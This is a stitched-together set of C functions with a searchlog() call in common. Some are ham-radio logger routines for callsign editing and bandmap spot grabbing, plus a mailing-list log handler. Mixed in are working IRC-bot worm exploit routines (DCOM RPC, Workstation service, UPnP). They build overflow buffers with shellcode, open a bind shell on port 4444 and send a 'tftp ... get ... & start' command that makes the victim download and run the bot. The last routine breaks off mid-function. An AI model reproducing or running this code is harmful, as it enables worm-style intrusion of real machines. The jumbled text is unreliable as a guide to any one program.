/* Perform the steps needed to grab a call and then free data
 * \return frequency of the spot in Hz
 */
static double execute_grab(spot *data) {
    extern char hiscall[];
    extern char mode[];
    extern int cqmode;
    extern float mem;
    extern float freq;

    /* the carrier offset reported by fldigi_get_carrier() is subtracted
     * from the spot QRG before tuning */
    double target = data->freq - fldigi_get_carrier();

    set_outfreq(target);
    send_bandswitch((int) target);

    /* NOTE(review): unbounded copy into hiscall[], whose size is not
     * visible here — relies on the bandmap producer limiting call length */
    strcpy(hiscall, data->call);

    /* refresh country info and partial-call search for the new call */
    showinfo(getctydata_pfx(hiscall));
    searchlog(hiscall);

    /* leaving CQ mode: switch to S&P and remember the QRG we were calling on */
    if (cqmode == CQ) {
	cqmode = S_P;
	strcpy(mode, "S&P     ");
	mem = freq;
	mvprintw(14, 68, "MEM: %7.1f", mem);
    }

    refreshp();

    /* ownership of the spot ends here; the caller must not use it again */
    g_free(data->call);
    g_free(data);

    return target;
}
/* Grab the next bandmap spot in the current scan direction.
 *
 * Scans in the remembered direction (initially up); when nothing is found
 * the direction is reversed, kept for the next call, and the lookup is
 * repeated once.  Does nothing without TRX control.  On a hit the rig is
 * tuned to the spot, the call is loaded into hiscall, the country and
 * partial-call displays are refreshed and, when in CQ mode, the program
 * switches to S&P remembering the current QRG in 'mem'.  The spot returned
 * by bandmap_next() is freed here.
 */
void grab_next(void)
{
    extern char hiscall[];
    extern char mode[];
    extern int cqmode;
    extern int trx_control;

    extern float mem;
    extern float freq;

#ifdef HAVE_LIBHAMLIB
    extern freq_t outfreq;
#else
    extern int outfreq;
#endif

    static int dir = 1;		/* start scanning up */

    spot *data;

    if (trx_control == 0)
	return;

    data = bandmap_next(dir, (unsigned int)(freq * 1000));
    if (data == NULL) {
	/* nothing in that direction: flip and try the other one */
	dir = 1 - dir;
	data = bandmap_next(dir, (unsigned int)(freq * 1000));
    }
    if (data == NULL)
	return;

    /* tune: spot QRG minus the carrier offset reported by fldigi */
    outfreq = data->freq;
    outfreq -= fldigi_get_carrier();
    send_bandswitch((int) outfreq);

    /* NOTE(review): unbounded copy; assumes data->call fits hiscall[] */
    strcpy(hiscall, data->call);

    showinfo(getctydata(hiscall));
    searchlog(hiscall);

    /* if in CQ mode switch to S&P and remember QRG */
    if (cqmode == CQ) {
	cqmode = S_P;
	strcpy(mode, "S&P     ");
	mem = freq;
	mvprintw(14, 68, "MEM: %7.1f", mem);
    }

    refreshp();

    /* spot ownership ends here */
    g_free(data->call);
    g_free(data);
}
/* Grab the bandmap spot matching the call currently typed in hiscall.
 *
 * Does nothing without TRX control or with an empty call field.  When
 * bandmap_lookup() finds a spot the rig is tuned to it, the (possibly
 * completed) call is loaded into hiscall, the country and partial-call
 * displays are refreshed and, when in CQ mode, the program switches to
 * S&P remembering the current QRG in 'mem'.  The spot is freed here.
 */
void grabspot(void)
{
    extern char hiscall[];
    extern char mode[];
    extern int cqmode;
    extern int trx_control;

    extern float mem;
    extern float freq;

#ifdef HAVE_LIBHAMLIB
    extern freq_t outfreq;
#else
    extern int outfreq;
#endif

    spot *data;

    if (trx_control == 0)
	return;

    /* nothing typed yet: nothing to look up */
    if (hiscall[0] == '\0')
	return;

    data = bandmap_lookup(hiscall);
    if (data == NULL)
	return;

    /* tune: spot QRG minus the carrier offset reported by fldigi */
    outfreq = data->freq;
    outfreq -= fldigi_get_carrier();
    send_bandswitch((int) outfreq);

    /* NOTE(review): unbounded copy; assumes data->call fits hiscall[] */
    strcpy(hiscall, data->call);

    showinfo(getctydata(hiscall));
    searchlog(hiscall);

    /* if in CQ mode switch to S&P and remember QRG */
    if (cqmode == CQ) {
	cqmode = S_P;
	strcpy(mode, "S&P     ");
	mem = freq;
	mvprintw(14, 68, "MEM: %7.1f", mem);
    }

    refreshp();

    /* spot ownership ends here */
    g_free(data->call);
    g_free(data);
}
/* Handle a moderator "log" request: mail the searchlog() output for
 * workdir to the moderator address (mod.s).
 *
 * action  - the full request string; actlen - length of the command word,
 *           so action + actlen is the optional search argument.  One
 *           leading '.' or '_' separator is skipped; an empty argument
 *           selects SUB_LOG, anything else SUB_LOG_SEARCH as subject.
 * Exits with status 100 when the list has no remote admin/flaglist
 * support or the sender is not a moderator (ismod).
 * Precondition (not checked here): action holds at least actlen bytes.
 */
static void do_log(char *action,unsigned int actlen)
{
  /* step over the command word and its separator */
  action += actlen;
  if (*action == '.' || *action == '_')
    ++action;

  /* access checks: feature enabled and caller is a moderator */
  if (!flaglist || remote.s == 0)
    strerr_die2x(100,FATAL,MSG(ERR_NOT_AVAILABLE));
  if (!ismod)
    strerr_die2x(100,FATAL,MSG(ERR_NOT_ALLOWED));

  showsend("log");
  if (*action == 0)
    hdr_subject(MSG(SUB_LOG));
  else
    hdr_subject(MSG(SUB_LOG_SEARCH));
  hdr_ctboundary();
  searchlog(workdir,action,code_subto);
  copybottom(0);
  qmail_to(&qq,mod.s);
}
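/* Interactive in-place editor for the callsign field (hiscall).
 *
 * Runs its own key loop via key_get() until <Escape>, ^E/<End>, a right
 * arrow past the last character, or the call reaching its maximum length.
 * Every change refreshes the country info (showinfo) and the partial-call
 * search (searchlog); <Tab> leaves 'block_part' set for the caller.
 *
 * Keys handled: ^A/<Home> (to head), ^E/<End> (to end, exit), left/right,
 * <Delete>, <Backspace>, <Insert> (toggles insertflg, which nothing else
 * reads here) and A-Z, 0-9, '/' which are inserted at the cursor.
 */
void calledit(void) {

    extern char hiscall[];
    extern int block_part;

    int i = 0, l, b = 0;	/* i = last key, b = cursor index in hiscall */
    int j = 0;
    int x = 0;
    int cnt = 0, insertflg = 0;	/* cnt counts consecutive <Del>/<Ins> */
    /* call1: head of the call plus the typed character, call2: tail from
     * the cursor on.  Both sized alike and zeroed so the copies below can
     * neither overrun nor read an unterminated buffer. */
    char call1[30] = "", call2[30] = "";

    l = strlen(hiscall);
    b = l - 1;			/* start on the last character */


    /* 'b' is int, strlen() is size_t: an empty call gives b == -1, which
     * compares as a huge unsigned value and ends the editor immediately */
    while ((i != 27) && (b <= strlen(hiscall))) {

	attroff(A_STANDOUT);
	attron(COLOR_PAIR(C_HEADER));

	mvprintw(12, 29, "            ");
	/* hiscall is user-entered text: print it through "%s" rather than
	 * as the format string, so a '%' in the field cannot reach printf */
	mvprintw(12, 29, "%s", hiscall);
	mvprintw(12, 29 + b, "");
	/* no refreshp() here as getch() calls wrefresh() for the
	 * panel with last output (where the cursor should go) */

	i = key_get();

	// <Delete> or <Insert>
	if ((i == KEY_DC) || (i == KEY_IC))
	    cnt++;
	else {
	    if (i != 27)
		cnt = 0;
	}

	// <Tab>
	if (i == 9)
	    block_part = 1;
	else
	    block_part = 0;

	// Ctrl-A (^A) or <Home>, move to head of callsign field.
	if (i == 1 || i == KEY_HOME) {
	    b = 0;
	    x = 0;
	}

	// Ctrl-E (^E) or <End>, move to end of callsign field, exit edit mode.
	if (i == 5 || i == KEY_END) {
	    b = strlen(hiscall);
	    break;
	}

	// Left arrow
	if (i == KEY_LEFT) {

	    if (b > 0)
		b--;

	    // Right arrow
	} else if (i == KEY_RIGHT) {
	    if (b < strlen(hiscall) - 1) {
		b++;
	    } else
		break;		/* stop edit */

	    // <Delete>
	} else if (i == KEY_DC) {

	    l = strlen(hiscall);

	    for (j = b; j <= l; j++) {
		hiscall[j] = hiscall[j + 1];	/* move to left incl. \0 */
	    }

	    showinfo(getctydata_pfx(hiscall));

	    // search only after more than one consecutive delete
	    if (cnt > 1)
		searchlog(hiscall);

	    // <Backspace>
	} else if (i == KEY_BACKSPACE) {

	    if (b > 0) {

		b--;

		l = strlen(hiscall);

		for (j = b; j <= l; j++) {
		    hiscall[j] = hiscall[j + 1];	/* move to left incl. \0 */
		}

		showinfo(getctydata_pfx(hiscall));

		if (cnt > 1)
		    searchlog(hiscall);
	    }

	    // <Insert>
	} else if (i == KEY_IC) {
	    if (insertflg == 0)
		insertflg = 1;
	    else
		insertflg = 0;

	    // Any character left other than <Escape>.
	} else if (i != 27) {

	    // Promote lower case to upper case.
	    if ((i >= 97) && (i <= 122))
		i = i - 32;

	    // Accept A-Z, '/' and 0-9
	    if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {

		call2[0] = '\0';

		if (b <= 12) {
		    strncpy(call1, hiscall, b);
		    /* tail from the cursor on, bounded by call2: the old
		     * count strlen(hiscall) - b + 1 could exceed the buffer
		     * when inserting at the head of a long call */
		    strncpy(call2, hiscall + b, sizeof call2 - 1);
		    call2[sizeof call2 - 1] = '\0';
		}

		if (strlen(hiscall) + 1 == 12)
		    break;	// leave insert mode

		if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {
		    call1[b] = i;
		    call1[b + 1] = '\0';
		    if ((strlen(call1) + strlen(call2)) < 12) {
			strcat(call1, call2);
			if (strlen(call1) >= 12)
			    break;
			/* at most 11 chars plus NUL; assumes hiscall[] is
			 * at least that large (its bound is not visible here) */
			strcpy(hiscall, call1);
		    }
		}

		if ((b < strlen(hiscall) - 1) && (b <= 12))
		    b++;
		else
		    break;

		showinfo(getctydata_pfx(hiscall));

		searchlog(hiscall);

	    } else if (x != 0)
		i = 27;		/* x is only ever assigned 0 here: dead branch */

	} else
	    i = 27;

    }

    attroff(A_STANDOUT);
    attron(COLOR_PAIR(C_HEADER));

    mvprintw(12, 29, "%s", hiscall);
    mvprintw(12, 29, "            ");
    refreshp();

    attron(A_STANDOUT);
    searchlog(hiscall);
}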
/* Review note: remote-exploitation routine, apparently part of an IRC-bot
 * exploit module (see the irc_privmsg/addlog reporting at the end).  Kept
 * verbatim; not reviewed for correctness or reliability.
 * Observable behaviour useful for detection: on port 445 a null-session
 * connect (ConnectViaNullSession) followed by opening
 * \\<ip>\pipe\epmapper; on any other port a raw TCP connect to
 * exinfo.ip:exinfo.port; in both cases a bind string is sent, then a
 * request packet from CreateDCOMRequestPacket().  Success is inferred
 * only from the local log (searchlog) reporting a TFTP transfer to
 * exinfo.ip, polled for up to 6 x 5 s.
 */
BOOL dcom(EXINFO exinfo)
{
	char sendbuf[IRCLINE];

	if (exinfo.port == 445) {
		NETRESOURCEW nr;

		if (!ConnectViaNullSession(exinfo.ip, &nr)) 
			return FALSE;
		else {
			char szPipePath[MAX_PATH];
			sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
			HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

			if (hFile == INVALID_HANDLE_VALUE) {
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
			// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);

			int TargetOS = FpHost(exinfo.ip, FP_PORT5K);

			// get shellcode
			DWORD reqbufsize;
			char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
			if (!reqbuf) {
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			unsigned long lWritten;
			char *szInBuf = (char *)malloc(100000);
			memset(szInBuf, 0, 100000);

			// send the bind string
			DWORD dwRead;
			TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
			if (szInBuf[2] != 0x0C) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// send the evil request
			if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);

			// all resources of this path (reqbuf, szInBuf, hFile, null session) released here
			free(reqbuf); 
			free(szInBuf);
			CloseHandle(hFile);
			CloseNullSession(exinfo.ip);

			if (Result == TRUE) {
				return FALSE;
			}
		}

	} else { // port 135 and others

		int TargetOS = FpHost(exinfo.ip, FP_RPC);
		if (TargetOS == OS_WINNT) 
			return FALSE;

		// get a funky fresh socket
		SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
		if (sSocket == SOCKET_ERROR) 
			return FALSE;

		// fill in sockaddr and resolve the host
		SOCKADDR_IN ssin; 
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons((unsigned short)exinfo.port);
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

		// get shellcode
		DWORD reqbufsize;
		char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
		if (!reqbuf) {
			fclosesocket(sSocket);
			return FALSE;
		}

		// connect to the server
		int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
		if (iErr == -1) { // connect failed, exit
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// send the bind string
		if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		char recvbuf[4096];
		frecv(sSocket, recvbuf, 4096, 0);
		// Send the evil request
		if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		free(reqbuf);
		// Close the socket
		fclosesocket(sSocket);		
	}

	// Success probe: poll the local log for a TFTP completion line for exinfo.ip
	// (up to 6 tries, 5 s apart) and report the hit to the channel and the log.
	sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
	for (int i=0; i < 6; i++) {
		if (searchlog(sendbuf)) {
			sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
			if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
			addlog(sendbuf);
			exploit[exinfo.exploit].stats++;

			break;
		}
		Sleep(5000);
	}

	return TRUE;
}
/* Review note: remote-exploitation routine from the same IRC-bot exploit
 * module; kept verbatim, not reviewed for correctness or reliability.
 * Observable behaviour useful for detection: loads netapi32.dll and calls
 * NetAddAlternateComputerName against \\<ip> with an oversized name
 * argument, then connects to TCP port 4444 on the target (WksSocket) and
 * sends a "tftp -i <attacker-ip> get <this executable>" command line.
 * Success is inferred from the local log (searchlog) reporting a TFTP
 * transfer to exinfo.ip, polled for up to 6 x 5 s.
 */
BOOL WksSvc(EXINFO exinfo)
{
	char sendbuf[IRCLINE];

	char WksFile[MAX_PATH];
	char cmd[500]; // Feel the wrath of my spontaneous comments
	SOCKET sock;
	char overwrite[2045] = "";
	char exp_buf[2045+4+16+501];
	char ip[30];
	LPWSTR ipl[60];
	DWORD jmpesp = 0x7518A747;
	//LPWSTR unicodesp0[(2045+4+16+501)*2];
	char unicode[(2045+4+16+501)*2];
	int z = 0;
	int x = 0;
	int len = 0;
	HINSTANCE hinstLib; 
    MYPROC ProcAddr; 
    BOOL fRunTimeLinkSuccess = FALSE; 
	WSADATA wsaData;

	if (fWSAStartup(MAKEWORD(2, 0), &wsaData)) return 0;

	GetModuleFileName(0, WksFile, sizeof(WksFile));	// Will contain path + filename? :x

	// Lets build our request... Seeing as our shellcode binds us a shell, tftp is easy ;O
	_snprintf(cmd,sizeof(cmd),
			"tftp -i %s get %s"
			"&start %s&wank\n", 
			GetIP(exinfo.sock),WksFile,WksFile);

	_snprintf(ip, 24, "\\\\%s", exinfo.ip);

	memset(overwrite, 0x41, 2000);
	memset(overwrite+2000, 0x90, 44);
	memcpy(exp_buf, overwrite, 2044);
	memcpy(exp_buf+2044, &jmpesp, 4);
	memset(exp_buf+2048, 0x90, 16);
	memcpy(exp_buf+2064, sc, sizeof(sc));

	// Small problem, SP0 or SP1? (Trying an incorrect one will probably crash the target machine, so its one or the other :P)
	
	// SP1 for now, seems more popular.
	memset(unicode, 0x00, sizeof(unicode));
	for (x = 0, z = 0; z <= sizeof(unicode); x++, z+=2) { 
		unicode[z] = exp_buf[x];						  
	}
	
	/* - SP0 Code
	len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));
	*/

	hinstLib = LoadLibrary("netapi32.dll"); // FIX ME: This is already loaded @ functions.h/loaddlls.cpp?

	MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
	
	ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
	if (NULL != ProcAddr) {
        	fRunTimeLinkSuccess = TRUE;	
		(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); // Run NAACN with our nasty settings :O

		/*
		(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
		*/

	} else {
		return FALSE;
	}
	// Exploit sent, lets check if they left us a shell :)

	Sleep(1000); // Testing only (May not be needed)

	// Lame old Thunderstorm socket checker.
	// Post-exploitation check: a connect to TCP 4444 on the target, then the
	// command line above is sent and replies are read until "not recognized" appears.
	if((sock=WksSocket(3, 4444, exinfo.ip)) != -1) {
		// Send our TFTP/FTP request
		fsend(sock, cmd, strlen(cmd), 0);

		unsigned int nReadBytes;
		char received[1000];

		while(1)
		{
			// Take a Break.
			Sleep(1000);

			unsigned long ul[2];
			ul[0]=1;
			ul[1]=sock;

			struct timeval timeout;

			timeout.tv_sec=1;
                	timeout.tv_usec=0;

			int l=fselect(0, (fd_set *)&ul, 0,0, &timeout);

			if ((l==1))
			{
				if((nReadBytes = frecv(sock, received, sizeof(received), 0))!= SOCKET_ERROR && nReadBytes!=0)
				{
					received[nReadBytes]=0x00;

					if(strstr(received, "not recognized"))
						break;
				}
			}
		}
	} else {
		return FALSE; // (The shell either hasn't arrived or has crashed, so we quit.)
	}

	// Success probe: poll the local log for a TFTP completion line for exinfo.ip
	// (up to 6 tries, 5 s apart) and report the hit to the channel and the log.
	sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
	for (int i=0; i < 6; i++) {
		if (searchlog(sendbuf)) {
			sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
			if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
			addlog(sendbuf);
			exploit[exinfo.exploit].stats++;

			break;
		}
		Sleep(5000);
	}

	fclosesocket(sock);
	return TRUE;
}
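/* Interactive in-place editor for the callsign field (hiscall).
 *
 * Runs its own key loop via onechar() until <Escape> (27), a right arrow
 * past the last character, or the call reaching its maximum length.
 * Every change refreshes the country info (getctydata/showinfo) and the
 * partial-call search (searchlog); <Tab> leaves 'block_part' set for the
 * caller.  Key codes used here: 1 = ^A/home, 5 = ^E/end, 155 = left,
 * 154 = right, 161 = delete, 127 = backspace, 160 = insert (toggles
 * insertflg, which nothing else reads here); A-Z, 0-9 and '/' are
 * inserted at the cursor.
 */
void calledit(void)
{

    extern char hiscall[];
    extern int block_part;

    int i = 0, l, b = 0;	/* i = last key, b = cursor index in hiscall */
    int j = 0;
    int x = 0;			/* last getctydata() result */
    int cnt = 0, insertflg = 0;	/* cnt counts consecutive <Ins>/<Del> */
    char dupecall[20];
    /* call1: head of the call plus the typed character, call2: tail from
     * the cursor on.  Both sized alike and zeroed so the copies below can
     * neither overrun nor read an unterminated buffer. */
    char call1[30] = "", call2[30] = "";

    l = strlen(hiscall);
    b = l - 1;			/* start on the last character */


    /* 'b' is int, strlen() is size_t: an empty call gives b == -1, which
     * compares as a huge unsigned value and ends the editor immediately */
    while ((i != 27) && (b <= strlen(hiscall))) {

	attroff(A_STANDOUT);
	attron(COLOR_PAIR(C_HEADER));

	mvprintw(12, 29, "            ");
	/* hiscall is user-entered text: print it through "%s" rather than
	 * as the format string, so a '%' in the field cannot reach printf */
	mvprintw(12, 29, "%s", hiscall);
	mvprintw(12, 29 + b, "");
	/* no refreshp() here as getch() calls wrefresh() for the
	 * panel with last output (where the cursor should go) */

	i = onechar();

	if ((i == 161) || (i == 160))	// Ins / Del
	    cnt++;
	else {
	    if (i != 27)
		cnt = 0;
	}

	if (i == 9)
	    block_part = 1;
	else
	    block_part = 0;

	if (i == 1)		// ctrl-A, home
	{
	    b = 0;
	    x = 0;
	}
	if (i == 5)		// ctrl-E, End
	{
	    b = strlen(hiscall) - 1;
	    x = 0;
	}

	if (i == 155) {		// left

	    if (b > 0)
		b--;

	} else if (i == 154) {	// right
	    if (b < strlen(hiscall) - 1) {
		b++;
	    } else
		break;		/* stop edit */

	} else if (i == 161) {	/* delete */

	    l = strlen(hiscall);

	    for (j = b; j <= l; j++) {
		hiscall[j] = hiscall[j + 1];	/* move to left incl. \0 */
	    }

	    /* update cty info; hiscall stays below 12 chars here, so the
	     * 16-byte strncpy always NUL-pads dupecall */
	    strncpy(dupecall, hiscall, 16);
	    x = getctydata(dupecall);
	    showinfo(x);

	    // search only after more than one consecutive delete
	    if (cnt > 1)
		searchlog(hiscall);

	} else if (i == 127) {	/* backspace */

	    if (b > 0) {

		b--;

		l = strlen(hiscall);

		for (j = b; j <= l; j++) {
		    hiscall[j] = hiscall[j + 1];	/* move to left incl. \0 */
		}

		strncpy(dupecall, hiscall, 16);	/* update cty info */
		x = getctydata(dupecall);
		showinfo(x);

		if (cnt > 1)
		    searchlog(hiscall);
	    }

	} else if (i == 160) {	/* insert */
	    if (insertflg == 0)
		insertflg = 1;
	    else
		insertflg = 0;

	} else if (i != 27) {

	    /* promote lower case to upper case */
	    if ((i >= 97) && (i <= 122))
		i = i - 32;

	    /* accept A-Z, '/' and 0-9 */
	    if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {

		if (b <= 12) {
		    strncpy(call1, hiscall, b);
		    /* tail from the cursor on, bounded by call2: the old
		     * count strlen(hiscall) - b + 1 could exceed the buffer
		     * when inserting at the head of a long call */
		    strncpy(call2, hiscall + b, sizeof call2 - 1);
		    call2[sizeof call2 - 1] = '\0';
		}

		if (strlen(hiscall) + 1 == 12)
		    break;	// leave insert mode

		if (((i >= 65) && (i <= 90)) || ((i >= 47) && (i <= 57))) {
		    call1[b] = i;
		    call1[b + 1] = '\0';
		    if ((strlen(call1) + strlen(call2)) < 12) {
			strcat(call1, call2);
			if (strlen(call1) >= 12)
			    break;
			/* at most 11 chars plus NUL; assumes hiscall[] is
			 * at least that large (its bound is not visible here) */
			strcpy(hiscall, call1);
		    }
		}

		if ((b < strlen(hiscall) - 1) && (b <= 12))
		    b++;
		else
		    break;

		strncpy(dupecall, hiscall, 16);	/* update cty info */
		x = getctydata(dupecall);
		showinfo(x);

		searchlog(hiscall);

	    } else if (x != 0)
		i = 27;		/* unusable key with a known country: stop editing */

	} else
	    i = 27;

    }

    attroff(A_STANDOUT);
    attron(COLOR_PAIR(C_HEADER));

    mvprintw(12, 29, "%s", hiscall);
    mvprintw(12, 29, "            ");
    refreshp();

    attron(A_STANDOUT);
    searchlog(hiscall);
}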
/* Review note: remote-exploitation routine (RPC variant) from the same
 * IRC-bot exploit module; kept verbatim, not reviewed for correctness or
 * reliability.
 * Observable behaviour useful for detection: a raw TCP connect to
 * exinfo.ip:exinfo.port, dcom2_bindstr sent first, byte 2 of the reply
 * compared against DCE_PKT_BINDACK, then szReqBuf sent and a reply of
 * DCE_PKT_FAULT treated as failure.  Success is inferred only from the
 * local log (searchlog) reporting a TFTP transfer to exinfo.ip, polled
 * for up to 6 x 5 s.
 */
BOOL dcom2(EXINFO exinfo)
{
	char sendbuf[IRCLINE],*pTemp;
	char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096];
	int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0;

	int TargetOS = FpHost(exinfo.ip, FP_RPC);
	if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE;

	// get a funky fresh socket
	SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
	if (sSocket == SOCKET_ERROR) return FALSE;

	// fill in sockaddr and resolve the host
	SOCKADDR_IN ssin; 
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

	iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
	if (!iShellSize) return 0;

	iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1);

	memcpy(szLoadBuf+iPos,							dcom2_shellcode_buf,	sizeof(dcom2_shellcode_buf)		); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szLoaderBuf,			iLoaderSize						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szShellBuf,             iShellSize	);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR,	&dcom2_my_offsets[0].lJmpAddr,	4						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, 	&dcom2_my_offsets[0].lTopSEH,	4						);
	iLoadSize = iPos; iPos = 0;

	pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
	*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iLoadSize / 2;
	*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize / 2; pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iLoadSize - 12;

	// connect with target IP
	int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
	if (iErr==-1) { // connect failed, exit
		fclosesocket(sSocket);
		return FALSE;
	}

	// send the bind string
	if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// read reply
	frecv(sSocket, szRecvBuf, 4096, 0);

	// Check for DCE_PKT_BINDACK
	if (szRecvBuf[2] != DCE_PKT_BINDACK) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// send evil request
	if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// read reply
	frecv(sSocket, szRecvBuf, 4096, 0);

	if (szRecvBuf[2] == DCE_PKT_FAULT) {
		fclosesocket(sSocket);
		return FALSE;
	}

	fclosesocket(sSocket);

	// Success probe: poll the local log for a TFTP completion line for exinfo.ip
	// (up to 6 tries, 5 s apart) and report the hit to the channel and the log.
	sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
	for (int i=0; i < 6; i++) {
		if (searchlog(sendbuf)) {
			sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
			if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
			addlog(sendbuf);
			exploit[exinfo.exploit].stats++;

			break;
		}
		Sleep(5000);
	}

	return TRUE;
}
/* Review note: remote-exploitation routine (UPnP variant) from the same
 * IRC-bot exploit module; kept verbatim, not reviewed for correctness or
 * reliability.
 * Observable behaviour useful for detection: a single TCP connect to
 * exinfo.ip:exinfo.port and one send of an oversized request built from
 * szJmpCode, szExeCode and the output of GetRNS0TerminatedShellcode(),
 * terminated by "\r\n\r\n".  Unlike the sibling routines this one waits
 * 1 s and checks the local log once (searchlog with TRUE) for a TFTP
 * transfer *started* to exinfo.ip before reporting.
 */
BOOL upnp(EXINFO exinfo)
{
	char sendbuf[IRCLINE],szRequest[2048],szJmpCode[281],szExeCode[840];
	int i;

	for(i = 0; i < 268; i++) 
		szJmpCode[i] = (char)0x43;

	szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
	szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
	szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
	szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;
	
	//jmp [ebx+0x64], jump to execute shellcode
	szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
	szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
	szJmpCode[280]=(char)0x00;

	for(i = 0; i < 32; i++) 
		szExeCode[i] = (char)0x43;
	szExeCode[32] = (char)0x00;

	char *sc = (char *)malloc(4096);
	DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename);
	if (!scsize) {
		free(sc);
		return FALSE;
	}

	strcat(szExeCode, sc);
